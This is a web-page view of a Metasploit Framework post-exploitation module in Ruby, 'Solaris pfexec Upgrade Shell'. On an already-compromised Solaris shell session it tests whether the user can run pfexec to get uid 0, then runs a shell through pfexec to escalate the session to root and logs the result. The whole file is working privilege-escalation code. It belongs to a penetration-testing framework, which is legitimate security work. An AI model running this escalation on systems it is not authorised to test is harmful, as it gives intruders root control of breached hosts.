Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/solaris/escalate/pfexec.rb
19722 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Solaris::System

9
  include Msf::Post::Solaris::Priv

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Solaris pfexec Upgrade Shell',

16
        'Description' => %q{

17
          This module attempts to upgrade a shell session to UID 0 using pfexec.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => ['bcoles'],

21
        'Platform' => 'solaris',

22
        'References' => [

23
          ['URL', 'https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html'],

24
          ['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],

25
          ['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']

26
        ],

27
        'SessionTypes' => ['shell'],

28
        'Notes' => {

29
          'Stability' => [CRASH_SAFE],

30
          'SideEffects' => [IOC_IN_LOGS],

31
          'Reliability' => [REPEATABLE_SESSION]

32
        }

33
      )

34
    )

35
    register_options([

36
      OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),

37
      OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])

38
    ])

39
  end

40


41
  def shell_path

42
    datastore['SHELL_PATH'].to_s

43
  end

44


45
  def pfexec_path

46
    datastore['PFEXEC_PATH'].to_s

47
  end

48


49
  def run

50
    unless session.type == 'shell'

51
      fail_with(Failure::BadConfig, "This module is not compatible with #{session.type} sessions")

52
    end

53


54
    if is_root?

55
      fail_with(Failure::BadConfig, 'Session already has root privileges')

56
    end

57


58
    unless command_exists?(pfexec_path)

59
      fail_with(Failure::NotVulnerable, "#{pfexec_path} does not exist")

60
    end

61


62
    user = cmd_exec('id -un').to_s

63


64
    print_status("Trying pfexec as `#{user}' ...")

65


66
    res = cmd_exec("#{pfexec_path} #{shell_path} -c id")

67
    vprint_status res

68


69
    unless res.include?('uid=0')

70
      fail_with(Failure::NotVulnerable, "User `#{user}' does not have permission to escalate with pfexec")

71
    end

72


73
    print_good('Success! Upgrading session ...')

74


75
    cmd_exec("#{pfexec_path} #{shell_path}")

76


77
    unless is_root?

78
      fail_with(Failure::NotVulnerable, 'Failed to escalate')

79
    end

80


81
    print_good('Success! root shell secured')

82
    report_note(

83
      host: session,

84
      type: 'host.escalation',

85
      data: { :escalation => "User `#{user}' pfexec'ed to a root shell" }

86
    )

87
  end

88
end

89


90